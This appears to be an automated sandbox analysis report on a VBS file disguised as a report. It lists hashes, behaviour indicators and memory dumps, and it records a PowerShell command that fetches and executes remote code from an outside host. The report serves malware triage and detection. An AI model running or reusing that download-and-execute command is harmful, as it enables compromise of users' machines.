038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907

Analysis

max time kernel
119s
max time network
124s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
26/03/2024, 16:37

Target

27032024_0037_Report-26-2024.vbs
Size

12KB
MD5

b371387b0b5551c936c94bdf36c2e2f5
SHA1

2f40590d998688bd681ea0afcea615b6a348cb31
SHA256

038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907
SHA512

2c31bc7357c6b87b85cf44cedb9b864c6050544707a0f053121833ce677b99fa1094b2850b4ac73520e31b4804830d39f96ae506ae57f4fa7c49e9f04317b057
SSDEEP

192:QMg119gkCtL3IqSPN3QzGNzUoNzhLnOdEpeLSHZgNdPR/Dnm9V4nN/Z/:Ly19gR3IquNgzG2oNdOdEpeeqlPxd

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2992	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2992	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1400 wrote to memory of 2992	1400	WScript.exe	28
PID 1400 wrote to memory of 2992	1400	WScript.exe	28
PID 1400 wrote to memory of 2992	1400	WScript.exe	28

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\27032024_0037_Report-26-2024.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq')
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2992

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/2992-4-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download
memory/2992-6-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2992-5-0x000000001B260000-0x000000001B542000-memory.dmp

Filesize
2.9MB

Download
memory/2992-7-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/2992-8-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download
memory/2992-10-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2992-9-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2992-11-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2992-12-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download